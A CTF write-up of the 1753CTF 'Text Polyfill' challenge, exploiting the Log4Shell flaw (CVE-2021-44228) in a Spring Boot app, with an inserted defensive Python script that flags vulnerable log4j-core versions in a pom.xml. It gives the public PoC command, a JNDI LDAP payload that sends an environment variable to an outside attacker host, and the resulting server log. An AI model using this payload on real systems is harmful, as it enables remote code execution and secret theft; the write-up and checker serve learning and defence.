1753CTF
Text Polyfill
The challenge was a log4j-vulnerable Java Spring Boot application. The pom.xml file in the Java Maven project says:
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
That's the vulnerable version of log4j everyone was going crazy about. There's this PoC exploit for log4j: https://github.com/kozmer/log4j-shell-poc.
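Spotting the bad dependency in the first place is the defender's half of this story. The checker below is an added example (not part of the writeup or the challenge code): it parses a pom.xml, resolves `${property}` indirection in the version, and compares each log4j-core version against the releases the Apache advisory names as fixing CVE-2021-44228 (2.15.0, with the 2.12.2 and 2.3.1 backports for the Java 7 and Java 6 branches). The sample pom.xml is constructed for the example and adds a property-based version on top of the literal one quoted above, since that is the form a plain grep for "2.14.1" misses.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample pom.xml, modelled on the dependency block quoted in the writeup.
# The property indirection (${log4j.version}) is a common pattern that naive grep checks miss.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>example</groupId>
  <artifactId>text-polyfill</artifactId>
  <version>0.0.1</version>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <version>2.5.6</version>
    </dependency>
  </dependencies>
</project>
"""

NS = {"m": "http://maven.apache.org/POM/4.0.0"}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Qualifiers are dropped."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_44228(version):
    """True if this log4j-core version still has the JNDI lookup of CVE-2021-44228.

    2.15.0 removed it on the main line; 2.12.2 and 2.3.1 are the backports for the
    Java 7 and Java 6 branches, so those branches are checked against their own fix.
    Builds before 2.0-beta9 are flagged too, which is a conservative false positive.
    """
    v = parse_version(version)
    if v[0] != 2:
        return False  # the affected lookup code only exists in the 2.x line
    if v[:2] == (2, 3):
        return v < (2, 3, 1)
    if v[:2] == (2, 12):
        return v < (2, 12, 2)
    return v < (2, 15, 0)


def resolve(value, props):
    """Expand ${name} against <properties>; unknown names are left as written."""
    return re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), value)


def find_log4j_core(pom_xml):
    """Return [(resolved_version_or_None, vulnerable_or_None)] for every log4j-core dependency."""
    root = ET.fromstring(pom_xml)
    props = {p.tag.split("}")[-1]: (p.text or "").strip()
             for p in root.findall("m:properties/*", NS)}
    findings = []
    for dep in root.findall(".//m:dependency", NS):
        gid = dep.findtext("m:groupId", default="", namespaces=NS).strip()
        aid = dep.findtext("m:artifactId", default="", namespaces=NS).strip()
        if (gid, aid) != ("org.apache.logging.log4j", "log4j-core"):
            continue
        raw = dep.findtext("m:version", default="", namespaces=NS).strip()
        ver = resolve(raw, props) if raw else None
        # No <version> means it is managed by a parent POM or BOM; resolve it with
        # `mvn dependency:tree` instead of guessing.
        findings.append((ver, is_vulnerable_44228(ver) if ver else None))
    return findings


if __name__ == "__main__":
    labels = {True: "VULNERABLE (CVE-2021-44228)", False: "ok",
              None: "version managed elsewhere, check `mvn dependency:tree`"}
    for ver, vuln in find_log4j_core(SAMPLE_POM):
        print(f"log4j-core {ver}: {labels[vuln]}")
```

The version test is branch-aware on purpose: a flat "below 2.15.0" rule would wrongly flag the patched 2.12.2 and 2.3.1 builds, and an "is it 2.14.1" grep would miss everything else in the affected range. Transitive inclusion of log4j-core through another artifact is not visible in a single pom.xml, which is why the script points at `mvn dependency:tree` for anything it cannot resolve.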
I ran this command on my VPS. I replaced its IP with 123.123.123.123.
~/ctf/log4j/log4j-shell-poc$ python3 poc.py --userip 123.123.123.123 --webport 8005 --lport 9001
The flag was an env variable. I submitted ${jndi:ldap://123.123.123.123:1389/${env:flag}} as the text with an image that I corrupted by just typing in random letters in Burp Suite in the middle of the image bytes until I got the right kind of error in the Java code for it to log that submitted text and execute the JNDI LDAP request. Yes, I fuzzed the PNG by hand, but it worked!
And the flag showed up in the terminal of the VPS:
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://123.123.123.123:1389/a}
[+] Starting Webserver on port 8005 http://0.0.0.0:8005
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:39:30] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -